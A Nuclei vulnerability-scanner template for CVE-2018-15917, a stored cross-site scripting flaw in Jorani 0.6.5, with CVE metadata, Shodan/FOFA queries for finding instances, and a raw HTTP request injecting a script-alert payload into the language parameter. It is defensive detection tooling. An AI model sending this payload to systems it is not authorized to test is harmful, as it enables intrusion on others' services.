nuclei-templates/http/cves/2018/CVE-2018-15917.yaml

61 lines
1.9 KiB
YAML

id: CVE-2018-15917
info:
name: Jorani Leave Management System 0.6.5 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/45338
- https://nvd.nist.gov/vuln/detail/CVE-2018-15917
- https://github.com/bbalet/jorani/issues/254
- https://github.com/JavierOlmedo/JavierOlmedo
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2018-15917
cwe-id: CWE-79
epss-score: 0.02648
epss-percentile: 0.90369
cpe: cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: jorani_project
product: jorani
shodan-query:
- title:"Login - Jorani"
- http.favicon.hash:-2032163853
fofa-query: icon_hash=-2032163853
tags: cve,cve2018,jorani,xss,jorani_project
http:
- raw:
- |
GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1
Host: {{Hostname}}
- |
GET /session/login HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- '_jorani'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502203412aba03e7df739713f759fcb37bef1eea1d3999931083f45827e66691d050f022100bfeb476846fd53627a129ee79b9bb245ee5f7a9c8fa80b019225676c03b850b1:922c64590222798bb761d5b6d8e72950